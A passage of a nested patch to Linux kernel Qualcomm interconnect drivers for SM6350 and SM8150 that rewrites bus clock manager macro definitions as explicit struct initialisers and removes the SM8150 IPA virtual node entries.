++	.num_nodes = 1,
++	.nodes = { &qns_memnoc_snoc },
++};
++
++static struct qcom_icc_bcm bcm_mm2 = {
++	.name = "MM2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns2_mem_noc },
++};
++
++static struct qcom_icc_bcm bcm_sh3 = {
++	.name = "SH3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &acm_tcu },
++};
++
++static struct qcom_icc_bcm bcm_mm3 = {
++	.name = "MM3",
++	.keepalive = false,
++	.num_nodes = 5,
++	.nodes = { &qxm_camnoc_sf, &qxm_rot, &qxm_venus0, &qxm_venus1, &qxm_venus_arm9 },
++};
++
++static struct qcom_icc_bcm bcm_sh5 = {
++	.name = "SH5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_apps },
++};
++
++static struct qcom_icc_bcm bcm_sn0 = {
++	.name = "SN0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_memnoc_sf },
++};
++
++static struct qcom_icc_bcm bcm_ce0 = {
++	.name = "CE0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_crypto },
++};
++
++static struct qcom_icc_bcm bcm_cn0 = {
++	.name = "CN0",
++	.keepalive = false,
++	.num_nodes = 47,
++	.nodes = { &qhm_spdm,
++		   &qhm_tic,
++		   &qnm_snoc,
++		   &xm_qdss_dap,
++		   &qhs_a1_noc_cfg,
++		   &qhs_a2_noc_cfg,
++		   &qhs_aop,
++		   &qhs_aoss,
++		   &qhs_camera_cfg,
++		   &qhs_clk_ctl,
++		   &qhs_compute_dsp_cfg,
++		   &qhs_cpr_cx,
++		   &qhs_crypto0_cfg,
++		   &qhs_dcc_cfg,
++		   &qhs_ddrss_cfg,
++		   &qhs_display_cfg,
++		   &qhs_glm,
++		   &qhs_gpuss_cfg,
++		   &qhs_imem_cfg,
++		   &qhs_ipa,
++		   &qhs_mnoc_cfg,
++		   &qhs_pcie0_cfg,
++		   &qhs_pcie_gen3_cfg,
++		   &qhs_pdm,
++		   &qhs_phy_refgen_south,
++		   &qhs_pimem_cfg,
++		   &qhs_prng,
++		   &qhs_qdss_cfg,
++		   &qhs_qupv3_north,
++		   &qhs_qupv3_south,
++		   &qhs_sdc2,
++		   &qhs_sdc4,
++		   &qhs_snoc_cfg,
++		   &qhs_spdm,
++		   &qhs_spss_cfg,
++		   &qhs_tcsr,
++		   &qhs_tlmm_north,
++		   &qhs_tlmm_south,
++		   &qhs_tsif,
++		   &qhs_ufs_card_cfg,
++		   &qhs_ufs_mem_cfg,
++		   &qhs_usb3_0,
++		   &qhs_usb3_1,
++		   &qhs_venus_cfg,
++		   &qhs_vsense_ctrl_cfg,
++		   &qns_cnoc_a2noc,
++		   &srvc_cnoc
++	},
++};
++
++static struct qcom_icc_bcm bcm_qup0 = {
++	.name = "QUP0",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qhm_qup1, &qhm_qup2 },
++};
++
++static struct qcom_icc_bcm bcm_sn1 = {
++	.name = "SN1",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_imem },
++};
++
++static struct qcom_icc_bcm bcm_sn2 = {
++	.name = "SN2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_memnoc_gc },
++};
++
++static struct qcom_icc_bcm bcm_sn3 = {
++	.name = "SN3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_cnoc },
++};
++
++static struct qcom_icc_bcm bcm_sn4 = {
++	.name = "SN4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_pimem },
++};
++
++static struct qcom_icc_bcm bcm_sn5 = {
++	.name = "SN5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xs_qdss_stm },
++};
++
++static struct qcom_icc_bcm bcm_sn6 = {
++	.name = "SN6",
++	.keepalive = false,
++	.num_nodes = 3,
++	.nodes = { &qhs_apss, &srvc_snoc, &xs_sys_tcu_cfg },
++};
++
++static struct qcom_icc_bcm bcm_sn7 = {
++	.name = "SN7",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_pcie },
++};
++
++static struct qcom_icc_bcm bcm_sn8 = {
++	.name = "SN8",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_pcie_gen3 },
++};
++
++static struct qcom_icc_bcm bcm_sn9 = {
++	.name = "SN9",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &srvc_aggre1_noc, &qnm_aggre1_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn11 = {
++	.name = "SN11",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &srvc_aggre2_noc, &qnm_aggre2_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn12 = {
++	.name = "SN12",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qnm_gladiator_sodv, &xm_gic },
++};
++
++static struct qcom_icc_bcm bcm_sn14 = {
++	.name = "SN14",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_pcie_anoc },
++};
++
++static struct qcom_icc_bcm bcm_sn15 = {
++	.name = "SN15",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_memnoc },
++};
+ 
+ static struct qcom_icc_bcm * const aggre1_noc_bcms[] = {
+ 	&bcm_sn9,
+diff --git a/drivers/interconnect/qcom/sm6350.c b/drivers/interconnect/qcom/sm6350.c
+index a3d46e59444e0..aae4b43b730c0 100644
+--- a/drivers/interconnect/qcom/sm6350.c
++++ b/drivers/interconnect/qcom/sm6350.c
+@@ -142,31 +142,233 @@ DEFINE_QNODE(srvc_snoc, SM6350_SLAVE_SERVICE_SNOC, 1, 4);
+ DEFINE_QNODE(xs_qdss_stm, SM6350_SLAVE_QDSS_STM, 1, 4);
+ DEFINE_QNODE(xs_sys_tcu_cfg, SM6350_SLAVE_TCU, 1, 8);
+ 
+-DEFINE_QBCM(bcm_acv, "ACV", false, &ebi);
+-DEFINE_QBCM(bcm_ce0, "CE0", false, &qxm_crypto);
+-DEFINE_QBCM(bcm_cn0, "CN0", true, &qnm_snoc, &xm_qdss_dap, &qhs_a1_noc_cfg, &qhs_a2_noc_cfg, &qhs_ahb2phy0, &qhs_aoss, &qhs_boot_rom, &qhs_camera_cfg, &qhs_camera_nrt_thrott_cfg, &qhs_camera_rt_throttle_cfg, &qhs_clk_ctl, &qhs_cpr_cx, &qhs_cpr_mx, &qhs_crypto0_cfg, &qhs_dcc_cfg, &qhs_ddrss_cfg, &qhs_display_cfg, &qhs_display_throttle_cfg, &qhs_glm, &qhs_gpuss_cfg, &qhs_imem_cfg, &qhs_ipa, &qhs_mnoc_cfg, &qhs_mss_cfg, &qhs_npu_cfg, &qhs_pimem_cfg, &qhs_prng, &qhs_qdss_cfg, &qhs_qm_cfg, &qhs_qm_mpu_cfg, &qhs_qup0, &qhs_qup1, &qhs_security, &qhs_snoc_cfg, &qhs_tcsr, &qhs_ufs_mem_cfg, &qhs_usb3_0, &qhs_venus_cfg, &qhs_venus_throttle_cfg, &qhs_vsense_ctrl_cfg, &srvc_cnoc);
+-DEFINE_QBCM(bcm_cn1, "CN1", false, &xm_emmc, &xm_sdc2, &qhs_ahb2phy2, &qhs_emmc_cfg, &qhs_pdm, &qhs_sdc2);
+-DEFINE_QBCM(bcm_co0, "CO0", false, &qns_cdsp_gemnoc);
+-DEFINE_QBCM(bcm_co2, "CO2", false, &qnm_npu);
+-DEFINE_QBCM(bcm_co3, "CO3", false, &qxm_npu_dsp);
+-DEFINE_QBCM(bcm_mc0, "MC0", true, &ebi);
+-DEFINE_QBCM(bcm_mm0, "MM0", true, &qns_mem_noc_hf);
+-DEFINE_QBCM(bcm_mm1, "MM1", true, &qxm_camnoc_hf0_uncomp, &qxm_camnoc_icp_uncomp, &qxm_camnoc_sf_uncomp, &qxm_camnoc_hf, &qxm_mdp0);
+-DEFINE_QBCM(bcm_mm2, "MM2", false, &qns_mem_noc_sf);
+-DEFINE_QBCM(bcm_mm3, "MM3", false, &qhm_mnoc_cfg, &qnm_video0, &qnm_video_cvp, &qxm_camnoc_sf);
+-DEFINE_QBCM(bcm_qup0, "QUP0", false, &qup0_core_master, &qup1_core_master, &qup0_core_slave, &qup1_core_slave);
+-DEFINE_QBCM(bcm_sh0, "SH0", true, &qns_llcc);
+-DEFINE_QBCM(bcm_sh2, "SH2", false, &acm_sys_tcu);
+-DEFINE_QBCM(bcm_sh3, "SH3", false, &qnm_cmpnoc);
+-DEFINE_QBCM(bcm_sh4, "SH4", false, &acm_apps);
+-DEFINE_QBCM(bcm_sn0, "SN0", true, &qns_gemnoc_sf);
+-DEFINE_QBCM(bcm_sn1, "SN1", false, &qxs_imem);
+-DEFINE_QBCM(bcm_sn2, "SN2", false, &qns_gemnoc_gc);
+-DEFINE_QBCM(bcm_sn3, "SN3", false, &qxs_pimem);
+-DEFINE_QBCM(bcm_sn4, "SN4", false, &xs_qdss_stm);
+-DEFINE_QBCM(bcm_sn5, "SN5", false, &qnm_aggre1_noc);
+-DEFINE_QBCM(bcm_sn6, "SN6", false, &qnm_aggre2_noc);
+-DEFINE_QBCM(bcm_sn10, "SN10", false, &qnm_gemnoc);
++static struct qcom_icc_bcm bcm_acv = {
++	.name = "ACV",
++	.enable_mask = BIT(3),
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_ce0 = {
++	.name = "CE0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_crypto },
++};
++
++static struct qcom_icc_bcm bcm_cn0 = {
++	.name = "CN0",
++	.keepalive = true,
++	.num_nodes = 41,
++	.nodes = { &qnm_snoc,
++		   &xm_qdss_dap,
++		   &qhs_a1_noc_cfg,
++		   &qhs_a2_noc_cfg,
++		   &qhs_ahb2phy0,
++		   &qhs_aoss,
++		   &qhs_boot_rom,
++		   &qhs_camera_cfg,
++		   &qhs_camera_nrt_thrott_cfg,
++		   &qhs_camera_rt_throttle_cfg,
++		   &qhs_clk_ctl,
++		   &qhs_cpr_cx,
++		   &qhs_cpr_mx,
++		   &qhs_crypto0_cfg,
++		   &qhs_dcc_cfg,
++		   &qhs_ddrss_cfg,
++		   &qhs_display_cfg,
++		   &qhs_display_throttle_cfg,
++		   &qhs_glm,
++		   &qhs_gpuss_cfg,
++		   &qhs_imem_cfg,
++		   &qhs_ipa,
++		   &qhs_mnoc_cfg,
++		   &qhs_mss_cfg,
++		   &qhs_npu_cfg,
++		   &qhs_pimem_cfg,
++		   &qhs_prng,
++		   &qhs_qdss_cfg,
++		   &qhs_qm_cfg,
++		   &qhs_qm_mpu_cfg,
++		   &qhs_qup0,
++		   &qhs_qup1,
++		   &qhs_security,
++		   &qhs_snoc_cfg,
++		   &qhs_tcsr,
++		   &qhs_ufs_mem_cfg,
++		   &qhs_usb3_0,
++		   &qhs_venus_cfg,
++		   &qhs_venus_throttle_cfg,
++		   &qhs_vsense_ctrl_cfg,
++		   &srvc_cnoc
++	},
++};
++
++static struct qcom_icc_bcm bcm_cn1 = {
++	.name = "CN1",
++	.keepalive = false,
++	.num_nodes = 6,
++	.nodes = { &xm_emmc,
++		   &xm_sdc2,
++		   &qhs_ahb2phy2,
++		   &qhs_emmc_cfg,
++		   &qhs_pdm,
++		   &qhs_sdc2
++	},
++};
++
++static struct qcom_icc_bcm bcm_co0 = {
++	.name = "CO0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_cdsp_gemnoc },
++};
++
++static struct qcom_icc_bcm bcm_co2 = {
++	.name = "CO2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_npu },
++};
++
++static struct qcom_icc_bcm bcm_co3 = {
++	.name = "CO3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_npu_dsp },
++};
++
++static struct qcom_icc_bcm bcm_mc0 = {
++	.name = "MC0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_mm0 = {
++	.name = "MM0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_hf },
++};
++
++static struct qcom_icc_bcm bcm_mm1 = {
++	.name = "MM1",
++	.keepalive = true,
++	.num_nodes = 5,
++	.nodes = { &qxm_camnoc_hf0_uncomp,
++		   &qxm_camnoc_icp_uncomp,
++		   &qxm_camnoc_sf_uncomp,
++		   &qxm_camnoc_hf,
++		   &qxm_mdp0
++	},
++};
++
++static struct qcom_icc_bcm bcm_mm2 = {
++	.name = "MM2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_sf },
++};
++
++static struct qcom_icc_bcm bcm_mm3 = {
++	.name = "MM3",
++	.keepalive = false,
++	.num_nodes = 4,
++	.nodes = { &qhm_mnoc_cfg, &qnm_video0, &qnm_video_cvp, &qxm_camnoc_sf },
++};
++
++static struct qcom_icc_bcm bcm_qup0 = {
++	.name = "QUP0",
++	.keepalive = false,
++	.num_nodes = 4,
++	.nodes = { &qup0_core_master, &qup1_core_master, &qup0_core_slave, &qup1_core_slave },
++};
++
++static struct qcom_icc_bcm bcm_sh0 = {
++	.name = "SH0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_llcc },
++};
++
++static struct qcom_icc_bcm bcm_sh2 = {
++	.name = "SH2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &acm_sys_tcu },
++};
++
++static struct qcom_icc_bcm bcm_sh3 = {
++	.name = "SH3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_cmpnoc },
++};
++
++static struct qcom_icc_bcm bcm_sh4 = {
++	.name = "SH4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &acm_apps },
++};
++
++static struct qcom_icc_bcm bcm_sn0 = {
++	.name = "SN0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_sf },
++};
++
++static struct qcom_icc_bcm bcm_sn1 = {
++	.name = "SN1",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_imem },
++};
++
++static struct qcom_icc_bcm bcm_sn2 = {
++	.name = "SN2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_gc },
++};
++
++static struct qcom_icc_bcm bcm_sn3 = {
++	.name = "SN3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_pimem },
++};
++
++static struct qcom_icc_bcm bcm_sn4 = {
++	.name = "SN4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xs_qdss_stm },
++};
++
++static struct qcom_icc_bcm bcm_sn5 = {
++	.name = "SN5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre1_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn6 = {
++	.name = "SN6",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre2_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn10 = {
++	.name = "SN10",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_gemnoc },
++};
+ 
+ static struct qcom_icc_bcm * const aggre1_noc_bcms[] = {
+ 	&bcm_cn1,
+diff --git a/drivers/interconnect/qcom/sm8150.c b/drivers/interconnect/qcom/sm8150.c
+index 1d04a4bfea800..685f35bbf5a7c 100644
+--- a/drivers/interconnect/qcom/sm8150.c
++++ b/drivers/interconnect/qcom/sm8150.c
+@@ -56,7 +56,6 @@ DEFINE_QNODE(qnm_pcie, SM8150_MASTER_GEM_NOC_PCIE_SNOC, 1, 16, SM8150_SLAVE_LLCC
+ DEFINE_QNODE(qnm_snoc_gc, SM8150_MASTER_SNOC_GC_MEM_NOC, 1, 8, SM8150_SLAVE_LLCC);
+ DEFINE_QNODE(qnm_snoc_sf, SM8150_MASTER_SNOC_SF_MEM_NOC, 1, 16, SM8150_SLAVE_LLCC);
+ DEFINE_QNODE(qxm_ecc, SM8150_MASTER_ECC, 2, 32, SM8150_SLAVE_LLCC);
+-DEFINE_QNODE(ipa_core_master, SM8150_MASTER_IPA_CORE, 1, 8, SM8150_SLAVE_IPA_CORE);
+ DEFINE_QNODE(llcc_mc, SM8150_MASTER_LLCC, 4, 4, SM8150_SLAVE_EBI_CH0);
+ DEFINE_QNODE(qhm_mnoc_cfg, SM8150_MASTER_CNOC_MNOC_CFG, 1, 4, SM8150_SLAVE_SERVICE_MNOC);
+ DEFINE_QNODE(qxm_camnoc_hf0, SM8150_MASTER_CAMNOC_HF0, 1, 32, SM8150_SLAVE_MNOC_HF_MEM_NOC);
+@@ -139,7 +138,6 @@ DEFINE_QNODE(qns_ecc, SM8150_SLAVE_ECC, 1, 32);
+ DEFINE_QNODE(qns_gem_noc_snoc, SM8150_SLAVE_GEM_NOC_SNOC, 1, 8, SM8150_MASTER_GEM_NOC_SNOC);
+ DEFINE_QNODE(qns_llcc, SM8150_SLAVE_LLCC, 4, 16, SM8150_MASTER_LLCC);
+ DEFINE_QNODE(srvc_gemnoc, SM8150_SLAVE_SERVICE_GEM_NOC, 1, 4);
+-DEFINE_QNODE(ipa_core_slave, SM8150_SLAVE_IPA_CORE, 1, 8);
+ DEFINE_QNODE(ebi, SM8150_SLAVE_EBI_CH0, 4, 4);
+ DEFINE_QNODE(qns2_mem_noc, SM8150_SLAVE_MNOC_SF_MEM_NOC, 1, 32, SM8150_MASTER_MNOC_SF_MEM_NOC);
+ DEFINE_QNODE(qns_mem_noc_hf, SM8150_SLAVE_MNOC_HF_MEM_NOC, 2, 32, SM8150_MASTER_MNOC_HF_MEM_NOC);
+@@ -156,35 +154,262 @@ DEFINE_QNODE(xs_pcie_1, SM8150_SLAVE_PCIE_1, 1, 8);
+ DEFINE_QNODE(xs_qdss_stm, SM8150_SLAVE_QDSS_STM, 1, 4);
+ DEFINE_QNODE(xs_sys_tcu_cfg, SM8150_SLAVE_TCU, 1, 8);
+ 
+-DEFINE_QBCM(bcm_acv, "ACV", false, &ebi);
+-DEFINE_QBCM(bcm_mc0, "MC0", true, &ebi);
+-DEFINE_QBCM(bcm_sh0, "SH0", true, &qns_llcc);
+-DEFINE_QBCM(bcm_mm0, "MM0", true, &qns_mem_noc_hf);
+-DEFINE_QBCM(bcm_mm1, "MM1", false, &qxm_camnoc_hf0_uncomp, &qxm_camnoc_hf1_uncomp, &qxm_camnoc_sf_uncomp, &qxm_camnoc_hf0, &qxm_camnoc_hf1, &qxm_mdp0, &qxm_mdp1);
+-DEFINE_QBCM(bcm_sh2, "SH2", false, &qns_gem_noc_snoc);
+-DEFINE_QBCM(bcm_mm2, "MM2", false, &qxm_camnoc_sf, &qns2_mem_noc);
+-DEFINE_QBCM(bcm_sh3, "SH3", false, &acm_gpu_tcu, &acm_sys_tcu);
+-DEFINE_QBCM(bcm_mm3, "MM3", false, &qxm_rot, &qxm_venus0, &qxm_venus1, &qxm_venus_arm9);
+-DEFINE_QBCM(bcm_sh4, "SH4", false, &qnm_cmpnoc);
+-DEFINE_QBCM(bcm_sh5, "SH5", false, &acm_apps);
+-DEFINE_QBCM(bcm_sn0, "SN0", true, &qns_gemnoc_sf);
+-DEFINE_QBCM(bcm_co0, "CO0", false, &qns_cdsp_mem_noc);
+-DEFINE_QBCM(bcm_ce0, "CE0", false, &qxm_crypto);
+-DEFINE_QBCM(bcm_sn1, "SN1", false, &qxs_imem);
+-DEFINE_QBCM(bcm_co1, "CO1", false, &qnm_npu);
+-DEFINE_QBCM(bcm_ip0, "IP0", false, &ipa_core_slave);
+-DEFINE_QBCM(bcm_cn0, "CN0", true, &qhm_spdm, &qnm_snoc, &qhs_a1_noc_cfg, &qhs_a2_noc_cfg, &qhs_ahb2phy_south, &qhs_aop, &qhs_aoss, &qhs_camera_cfg, &qhs_clk_ctl, &qhs_compute_dsp, &qhs_cpr_cx, &qhs_cpr_mmcx, &qhs_cpr_mx, &qhs_crypto0_cfg, &qhs_ddrss_cfg, &qhs_display_cfg, &qhs_emac_cfg, &qhs_glm, &qhs_gpuss_cfg, &qhs_imem_cfg, &qhs_ipa, &qhs_mnoc_cfg, &qhs_npu_cfg, &qhs_pcie0_cfg, &qhs_pcie1_cfg, &qhs_phy_refgen_north, &qhs_pimem_cfg, &qhs_prng, &qhs_qdss_cfg, &qhs_qspi, &qhs_qupv3_east, &qhs_qupv3_north, &qhs_qupv3_south, &qhs_sdc2, &qhs_sdc4, &qhs_snoc_cfg, &qhs_spdm, &qhs_spss_cfg, &qhs_ssc_cfg, &qhs_tcsr, &qhs_tlmm_east, &qhs_tlmm_north, &qhs_tlmm_south, &qhs_tlmm_west, &qhs_tsif, &qhs_ufs_card_cfg, &qhs_ufs_mem_cfg, &qhs_usb3_0, &qhs_usb3_1, &qhs_venus_cfg, &qhs_vsense_ctrl_cfg, &qns_cnoc_a2noc, &srvc_cnoc);
+-DEFINE_QBCM(bcm_qup0, "QUP0", false, &qhm_qup0, &qhm_qup1, &qhm_qup2);
+-DEFINE_QBCM(bcm_sn2, "SN2", false, &qns_gemnoc_gc);
+-DEFINE_QBCM(bcm_sn3, "SN3", false, &srvc_aggre1_noc, &srvc_aggre2_noc, &qns_cnoc);
+-DEFINE_QBCM(bcm_sn4, "SN4", false, &qxs_pimem);
+-DEFINE_QBCM(bcm_sn5, "SN5", false, &xs_qdss_stm);
+-DEFINE_QBCM(bcm_sn8, "SN8", false, &xs_pcie_0, &xs_pcie_1);
+-DEFINE_QBCM(bcm_sn9, "SN9", false, &qnm_aggre1_noc);
+-DEFINE_QBCM(bcm_sn11, "SN11", false, &qnm_aggre2_noc);
+-DEFINE_QBCM(bcm_sn12, "SN12", false, &qxm_pimem, &xm_gic);
+-DEFINE_QBCM(bcm_sn14, "SN14", false, &qns_pcie_mem_noc);
+-DEFINE_QBCM(bcm_sn15, "SN15", false, &qnm_gemnoc);
++static struct qcom_icc_bcm bcm_acv = {
++	.name = "ACV",
++	.enable_mask = BIT(3),
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_mc0 = {
++	.name = "MC0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_sh0 = {
++	.name = "SH0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_llcc },
++};
++
++static struct qcom_icc_bcm bcm_mm0 = {
++	.name = "MM0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_hf },
++};
++
++static struct qcom_icc_bcm bcm_mm1 = {
++	.name = "MM1",
++	.keepalive = false,
++	.num_nodes = 7,
++	.nodes = { &qxm_camnoc_hf0_uncomp,
++		   &qxm_camnoc_hf1_uncomp,
++		   &qxm_camnoc_sf_uncomp,
++		   &qxm_camnoc_hf0,
++		   &qxm_camnoc_hf1,
++		   &qxm_mdp0,
++		   &qxm_mdp1
++	},
++};
++
++static struct qcom_icc_bcm bcm_sh2 = {
++	.name = "SH2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_gem_noc_snoc },
++};
++
++static struct qcom_icc_bcm bcm_mm2 = {
++	.name = "MM2",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qxm_camnoc_sf, &qns2_mem_noc },
++};
++
++static struct qcom_icc_bcm bcm_sh3 = {
++	.name = "SH3",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &acm_gpu_tcu, &acm_sys_tcu },
++};
++
++static struct qcom_icc_bcm bcm_mm3 = {
++	.name = "MM3",
++	.keepalive = false,
++	.num_nodes = 4,
++	.nodes = { &qxm_rot, &qxm_venus0, &qxm_venus1, &qxm_venus_arm9 },
++};
++
++static struct qcom_icc_bcm bcm_sh4 = {
++	.name = "SH4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_cmpnoc },
++};
++
++static struct qcom_icc_bcm bcm_sh5 = {
++	.name = "SH5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &acm_apps },
++};
++
++static struct qcom_icc_bcm bcm_sn0 = {
++	.name = "SN0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_sf },
++};
++
++static struct qcom_icc_bcm bcm_co0 = {
++	.name = "CO0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_cdsp_mem_noc },
++};
++
++static struct qcom_icc_bcm bcm_ce0 = {
++	.name = "CE0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_crypto },
++};
++
++static struct qcom_icc_bcm bcm_sn1 = {
++	.name = "SN1",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_imem },
++};
++
++static struct qcom_icc_bcm bcm_co1 = {
++	.name = "CO1",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_npu },
++};
++
++static struct qcom_icc_bcm bcm_cn0 = {
++	.name = "CN0",
++	.keepalive = true,
++	.num_nodes = 53,
++	.nodes = { &qhm_spdm,
++		   &qnm_snoc,
++		   &qhs_a1_noc_cfg,
++		   &qhs_a2_noc_cfg,
++		   &qhs_ahb2phy_south,
++		   &qhs_aop,
++		   &qhs_aoss,
++		   &qhs_camera_cfg,
++		   &qhs_clk_ctl,
++		   &qhs_compute_dsp,
++		   &qhs_cpr_cx,
++		   &qhs_cpr_mmcx,
++		   &qhs_cpr_mx,
++		   &qhs_crypto0_cfg,
++		   &qhs_ddrss_cfg,
++		   &qhs_display_cfg,
++		   &qhs_emac_cfg,
++		   &qhs_glm,
++		   &qhs_gpuss_cfg,
++		   &qhs_imem_cfg,
++		   &qhs_ipa,
++		   &qhs_mnoc_cfg,
++		   &qhs_npu_cfg,
++		   &qhs_pcie0_cfg,
++		   &qhs_pcie1_cfg,
++		   &qhs_phy_refgen_north,
++		   &qhs_pimem_cfg,
++		   &qhs_prng,
++		   &qhs_qdss_cfg,
++		   &qhs_qspi,
++		   &qhs_qupv3_east,
++		   &qhs_qupv3_north,
++		   &qhs_qupv3_south,
++		   &qhs_sdc2,
++		   &qhs_sdc4,
++		   &qhs_snoc_cfg,
++		   &qhs_spdm,
++		   &qhs_spss_cfg,
++		   &qhs_ssc_cfg,
++		   &qhs_tcsr,
++		   &qhs_tlmm_east,
++		   &qhs_tlmm_north,
++		   &qhs_tlmm_south,
++		   &qhs_tlmm_west,
++		   &qhs_tsif,
++		   &qhs_ufs_card_cfg,
++		   &qhs_ufs_mem_cfg,
++		   &qhs_usb3_0,
++		   &qhs_usb3_1,
++		   &qhs_venus_cfg,
++		   &qhs_vsense_ctrl_cfg,
++		   &qns_cnoc_a2noc,
++		   &srvc_cnoc
++	},
++};
++
++static struct qcom_icc_bcm bcm_qup0 = {
++	.name = "QUP0",
++	.keepalive = false,
++	.num_nodes = 3,
++	.nodes = { &qhm_qup0, &qhm_qup1, &qhm_qup2 },
++};
++
++static struct qcom_icc_bcm bcm_sn2 = {
++	.name = "SN2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_gc },
++};
++
++static struct qcom_icc_bcm bcm_sn3 = {
++	.name = "SN3",
++	.keepalive = false,
++	.num_nodes = 3,
++	.nodes = { &srvc_aggre1_noc, &srvc_aggre2_noc, &qns_cnoc },
++};
++
++static struct qcom_icc_bcm bcm_sn4 = {
++	.name = "SN4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_pimem },
++};
++
++static struct qcom_icc_bcm bcm_sn5 = {
++	.name = "SN5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xs_qdss_stm },
++};
++
++static struct qcom_icc_bcm bcm_sn8 = {
++	.name = "SN8",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &xs_pcie_0, &xs_pcie_1 },
++};
++
++static struct qcom_icc_bcm bcm_sn9 = {
++	.name = "SN9",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre1_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn11 = {
++	.name = "SN11",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre2_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn12 = {
++	.name = "SN12",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qxm_pimem, &xm_gic },
++};
++
++static struct qcom_icc_bcm bcm_sn14 = {
++	.name = "SN14",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_pcie_mem_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn15 = {
++	.name = "SN15",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_gemnoc },
++};
+ 
+ static struct qcom_icc_bcm * const aggre1_noc_bcms[] = {
+ 	&bcm_qup0,
+@@ -398,22 +623,6 @@ static const struct qcom_icc_desc sm8150_gem_noc = {
+ 	.num_bcms = ARRAY_SIZE(gem_noc_bcms),
+ };
+ 
+-static struct qcom_icc_bcm * const ipa_virt_bcms[] = {
+-	&bcm_ip0,
+-};
+-
+-static struct qcom_icc_node * const ipa_virt_nodes[] = {
+-	[MASTER_IPA_CORE] = &ipa_core_master,
+-	[SLAVE_IPA_CORE] = &ipa_core_slave,
+-};
+-
+-static const struct qcom_icc_desc sm8150_ipa_virt = {
+-	.nodes = ipa_virt_nodes,
+-	.num_nodes = ARRAY_SIZE(ipa_virt_nodes),
+-	.bcms = ipa_virt_bcms,
+-	.num_bcms = ARRAY_SIZE(ipa_virt_bcms),
+-};
+-
+ static struct qcom_icc_bcm * const mc_virt_bcms[] = {
+ 	&bcm_acv,
